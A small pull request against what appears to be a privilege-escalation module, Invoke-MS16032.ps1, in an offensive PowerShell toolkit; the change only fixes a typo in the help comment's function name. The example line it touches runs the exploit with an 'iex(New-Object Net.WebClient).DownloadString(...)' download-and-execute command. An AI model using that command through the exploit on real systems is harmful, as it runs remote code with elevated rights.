### PR TITLE
Invoke-MS16032.ps1: Fix example comment by removing additional dash

### DIFF
--- a/data/module_source/privesc/Invoke-MS16032.ps1
+++ b/data/module_source/privesc/Invoke-MS16032.ps1
@@ -36,7 +36,7 @@ function Invoke-MS16032 {
         
     .EXAMPLE
 
-        C:\PS> Invoke-MS16-032 -Command "iex(New-Object Net.WebClient).DownloadString('http://google.com')"
+        C:\PS> Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://google.com')"
 
         Description
         -----------


### PR DESCRIPTION
This is just a small change fixing the example command for Invoke-MS16032.ps1 which probably remained from FuzzySecurity's module.